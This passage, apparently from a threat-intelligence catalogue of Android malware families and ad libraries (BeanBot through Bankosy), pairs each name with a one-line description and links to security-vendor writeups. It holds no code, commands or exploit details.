<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://crypto.stanford.edu/cs155old/cs155-spring16/lectures/18-mobile-malware.pdf">https://crypto.stanford.edu/cs155old/cs155-spring16/lectures/18-mobile-malware.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_beanbot"><a class="anchor" href="#_beanbot"></a><a class="link" href="#_beanbot">BeanBot</a></h3>
<div class="paragraph">
<p>BeanBot forwards device&#8217;s data to a remote server and sends out premium-rate SMS messages from the infected device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 25. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/v-descs/trojan_android_beanbot.shtml">https://www.f-secure.com/v-descs/trojan_android_beanbot.shtml</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kemoge"><a class="anchor" href="#_kemoge"></a><a class="link" href="#_kemoge">Kemoge</a></h3>
<div class="paragraph">
<p>Kemoge is adware that disguises itself as popular apps via repackaging, then allows for a complete takeover of the users Android device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 26. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/10/kemoge_another_mobi.html">https://www.fireeye.com/blog/threat-research/2015/10/kemoge_another_mobi.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-101207-3555-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-101207-3555-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ghost_push"><a class="anchor" href="#_ghost_push"></a><a class="link" href="#_ghost_push">Ghost Push</a></h3>
<div class="paragraph">
<p>Ghost Push is a family of malware that infects the Android OS by automatically gaining root access, downloading malicious software, masquerading as a system app, and then losing root access, which then makes it virtually impossible to remove the infection even by factory reset unless the firmware is reflashed.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 27. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Ghost_Push">https://en.wikipedia.org/wiki/Ghost_Push</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.avast.com/how-to-protect-your-android-device-from-ghost-push">https://blog.avast.com/how-to-protect-your-android-device-from-ghost-push</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_benews"><a class="anchor" href="#_benews"></a><a class="link" href="#_benews">BeNews</a></h3>
<div class="paragraph">
<p>The BeNews app is a backdoor app that uses the name of defunct news site BeNews to appear legitimate. After installation it bypasses restrictions and downloads additional threats to the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 28. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/fake-news-app-in-hacking-team-dump-designed-to-bypass-google-play/">http://blog.trendmicro.com/trendlabs-security-intelligence/fake-news-app-in-hacking-team-dump-designed-to-bypass-google-play/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_accstealer"><a class="anchor" href="#_accstealer"></a><a class="link" href="#_accstealer">Accstealer</a></h3>
<div class="paragraph">
<p>Accstealer is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 29. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-012711-1159-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-012711-1159-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acnetdoor"><a class="anchor" href="#_acnetdoor"></a><a class="link" href="#_acnetdoor">Acnetdoor</a></h3>
<div class="paragraph">
<p>Acnetdoor is a detection for Trojan horses on the Android platform that open a back door on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 30. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051611-4258-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-051611-4258-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_acnetsteal"><a class="anchor" href="#_acnetsteal"></a><a class="link" href="#_acnetsteal">Acnetsteal</a></h3>
<div class="paragraph">
<p>Acnetsteal is a detection for Trojan horses on the Android platform that steal information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 31. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-051612-0505-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-051612-0505-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_actech"><a class="anchor" href="#_actech"></a><a class="link" href="#_actech">Actech</a></h3>
<div class="paragraph">
<p>Actech is a Trojan horse for Android devices that steals information and sends it to a remote location.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 32. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-080111-3948-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-080111-3948-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adchina"><a class="anchor" href="#_adchina"></a><a class="link" href="#_adchina">AdChina</a></h3>
<div class="paragraph">
<p>AdChina is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 33. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-2947-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-2947-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adfonic"><a class="anchor" href="#_adfonic"></a><a class="link" href="#_adfonic">Adfonic</a></h3>
<div class="paragraph">
<p>Adfonic is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 34. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052615-0024-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052615-0024-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adinfo"><a class="anchor" href="#_adinfo"></a><a class="link" href="#_adinfo">AdInfo</a></h3>
<div class="paragraph">
<p>AdInfo is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 35. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2433-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2433-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adknowledge"><a class="anchor" href="#_adknowledge"></a><a class="link" href="#_adknowledge">Adknowledge</a></h3>
<div class="paragraph">
<p>Adknowledge is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 36. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-1033-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-1033-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_admarvel"><a class="anchor" href="#_admarvel"></a><a class="link" href="#_admarvel">AdMarvel</a></h3>
<div class="paragraph">
<p>AdMarvel is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 37. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-2450-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-2450-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_admob"><a class="anchor" href="#_admob"></a><a class="link" href="#_admob">AdMob</a></h3>
<div class="paragraph">
<p>AdMob is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 38. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-3437-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-3437-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adrd"><a class="anchor" href="#_adrd"></a><a class="link" href="#_adrd">Adrd</a></h3>
<div class="paragraph">
<p>Adrd is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 39. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-021514-4954-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-021514-4954-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aduru"><a class="anchor" href="#_aduru"></a><a class="link" href="#_aduru">Aduru</a></h3>
<div class="paragraph">
<p>Aduru is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 40. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-2419-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-2419-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adwhirl"><a class="anchor" href="#_adwhirl"></a><a class="link" href="#_adwhirl">Adwhirl</a></h3>
<div class="paragraph">
<p>Adwhirl is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 41. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1414-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1414-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adwlauncher"><a class="anchor" href="#_adwlauncher"></a><a class="link" href="#_adwlauncher">Adwlauncher</a></h3>
<div class="paragraph">
<p>Adwlauncher is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 42. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-082308-1823-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-082308-1823-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_adwo"><a class="anchor" href="#_adwo"></a><a class="link" href="#_adwo">Adwo</a></h3>
<div class="paragraph">
<p>Adwo is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 43. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-5806-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-5806-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_airad"><a class="anchor" href="#_airad"></a><a class="link" href="#_airad">Airad</a></h3>
<div class="paragraph">
<p>Airad is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 44. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-1704-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-1704-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_alienspy"><a class="anchor" href="#_alienspy"></a><a class="link" href="#_alienspy">Alienspy</a></h3>
<div class="paragraph">
<p>Alienspy is a Trojan horse for Android devices that steals information from the compromised device. It may also download potentially malicious files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 45. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2015-042714-5942-99">https://www.symantec.com/security_response/writeup.jsp?docid=2015-042714-5942-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_amazonads"><a class="anchor" href="#_amazonads"></a><a class="link" href="#_amazonads">AmazonAds</a></h3>
<div class="paragraph">
<p>AmazonAds is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 46. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-5002-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-5002-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_answerbot"><a class="anchor" href="#_answerbot"></a><a class="link" href="#_answerbot">Answerbot</a></h3>
<div class="paragraph">
<p>Answerbot is a Trojan horse that opens a back door on Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 47. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-100711-2129-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-100711-2129-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_antammi"><a class="anchor" href="#_antammi"></a><a class="link" href="#_antammi">Antammi</a></h3>
<div class="paragraph">
<p>Antammi is a Trojan horse that steals information from Android devices.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 48. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-032106-5211-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-032106-5211-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apkmore"><a class="anchor" href="#_apkmore"></a><a class="link" href="#_apkmore">Apkmore</a></h3>
<div class="paragraph">
<p>Apkmore is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 49. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-4813-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-4813-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aplog"><a class="anchor" href="#_aplog"></a><a class="link" href="#_aplog">Aplog</a></h3>
<div class="paragraph">
<p>Aplog is a Trojan horse for Android devices that steals information from the device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 50. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-100911-1023-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-100911-1023-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_appenda"><a class="anchor" href="#_appenda"></a><a class="link" href="#_appenda">Appenda</a></h3>
<div class="paragraph">
<p>Appenda is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 51. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-062812-0516-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-062812-0516-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apperhand"><a class="anchor" href="#_apperhand"></a><a class="link" href="#_apperhand">Apperhand</a></h3>
<div class="paragraph">
<p>Apperhand is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 52. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5637-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5637-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_appleservice"><a class="anchor" href="#_appleservice"></a><a class="link" href="#_appleservice">Appleservice</a></h3>
<div class="paragraph">
<p>Appleservice is a Trojan horse for Android devices that may steal information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 53. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031011-4321-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031011-4321-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_applovin"><a class="anchor" href="#_applovin"></a><a class="link" href="#_applovin">AppLovin</a></h3>
<div class="paragraph">
<p>AppLovin is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 54. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-1739-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-1739-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_arspam"><a class="anchor" href="#_arspam"></a><a class="link" href="#_arspam">Arspam</a></h3>
<div class="paragraph">
<p>Arspam is a Trojan horse for Android devices that sends spam SMS messages to contacts on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 55. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2011-121915-3251-99">https://www.symantec.com/security_response/writeup.jsp?docid=2011-121915-3251-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aurecord"><a class="anchor" href="#_aurecord"></a><a class="link" href="#_aurecord">Aurecord</a></h3>
<div class="paragraph">
<p>Aurecord is a spyware application for Android devices that allows the device it is installed on to be monitored.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 56. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-2310-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-2310-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backapp"><a class="anchor" href="#_backapp"></a><a class="link" href="#_backapp">Backapp</a></h3>
<div class="paragraph">
<p>Backapp is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 57. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-092708-5017-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-092708-5017-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backdexer"><a class="anchor" href="#_backdexer"></a><a class="link" href="#_backdexer">Backdexer</a></h3>
<div class="paragraph">
<p>Backdexer is a Trojan horse for Android devices that may send premium-rate SMS messages from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 58. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-121812-2502-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-121812-2502-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backflash"><a class="anchor" href="#_backflash"></a><a class="link" href="#_backflash">Backflash</a></h3>
<div class="paragraph">
<p>Backflash is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 59. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-091714-0427-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-091714-0427-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backscript"><a class="anchor" href="#_backscript"></a><a class="link" href="#_backscript">Backscript</a></h3>
<div class="paragraph">
<p>Backscript is a Trojan horse for Android devices that downloads files onto the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 60. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2012-090704-3639-99">https://www.symantec.com/security_response/writeup.jsp?docid=2012-090704-3639-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_badaccents"><a class="anchor" href="#_badaccents"></a><a class="link" href="#_badaccents">Badaccents</a></h3>
<div class="paragraph">
<p>Badaccents is a Trojan horse for Android devices that may download apps on the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 61. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-123015-3618-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-123015-3618-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_badpush"><a class="anchor" href="#_badpush"></a><a class="link" href="#_badpush">Badpush</a></h3>
<div class="paragraph">
<p>Badpush is an advertisement library that is bundled with certain Android applications.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 62. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-4133-99">https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-4133-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ballonpop"><a class="anchor" href="#_ballonpop"></a><a class="link" href="#_ballonpop">Ballonpop</a></h3>
<div class="paragraph">
<p>Ballonpop is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 63. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2013-120911-1731-99">https://www.symantec.com/security_response/writeup.jsp?docid=2013-120911-1731-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bankosy"><a class="anchor" href="#_bankosy"></a><a class="link" href="#_bankosy">Bankosy</a></h3>
<div class="paragraph">
<p>Bankosy is a Trojan horse for Android devices that steals information from the compromised device.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 64. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
